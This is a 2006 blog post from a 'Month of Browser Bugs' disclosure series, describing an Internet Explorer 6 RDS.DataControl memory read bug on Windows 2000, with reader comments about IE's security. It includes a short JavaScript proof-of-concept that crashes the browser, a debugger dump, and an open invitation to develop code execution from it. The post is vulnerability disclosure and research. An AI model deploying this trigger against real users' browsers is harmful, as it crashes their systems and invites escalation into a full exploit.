Friday, July 07, 2006

MoBB #8: RDS.DataControl URL

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows 2000 SP4 system. The RDS.DataControl object copies the URL parameter from javascript using the SysAllocStringLen routine in OLE32.dll. On Windows 2000, this can lead to an invalid length calculation that results in a memory read going beyond the end of the page. It appears that some form of heap corruption may be occurring before the access violation, but without a SEH pointer on the heap, this isn't useful for exploitation. If you can find a way achieve code execution using this bug, please contact me for a prize :-)

var a = new ActiveXObject('RDS.DataControl');
var b = "X";
while (b.length < (1024*256)) a.URL = (b+=b);

Demonstration

eax=001be00c ebx=00005a70 ecx=00000231
edx=00005a70 esi=00191000 edi=001c31b8
eip=779d927a esp=0012b1b4 ebp=7c59c147
OLEAUT32!SysAllocStringLen+0x7a:
779d927a f3a5 rep movsd ds:00191000=???????? es:001c31b8=00580058

This bug was reported to Microsoft in March of 2006.
This bug will be added to the OSVDB:
Microsoft IE RDS.DataControl SysAllocStringLen Invalid Length

posted by hdm @ 11:41 PM   4 comments links to this post

4 Comments:

At 2:15 PM, Anonymous VIking69 said...

I ran this on my VISTA Beta 2 using IE 7 Beta 2 and it asked me if i wanted to run an ActiveX control. It stated in the block that it was a Microsoft item. I did not run it.

That is why I do not crash my system.

 
At 9:00 PM, Anonymous Anonymous said...

THis makes me sad to see so many bugs in IE, wow!!!!! HD MOORE should give ie a break LOL.. I wish i knew what ie bugs are patched, hdm any thoughts?

 
At 9:24 PM, Blogger hdm said...

If IE still has 85% of the user base, expect that percent of the MoBB bugs to target IE :-) If a patch is available, it will be noted in the bug description.

 
At 4:51 PM, Anonymous Anonymous said...

It has nothing to do with Market share. Apache which has a larger market share than IIS has continually had fewer bugs. It's about coding errors and the companies responsibility to fix them.

Its a fact that the open source community is faster to respond to bugs (within 24 hours in most cases) than their proprietary neighbors and that generally (because more eyes are on the code) more bug free.

Just accept the knocks and blame the company for being slow to respond.

 

Post a Comment

Links to this post:

Create a Link

<< Home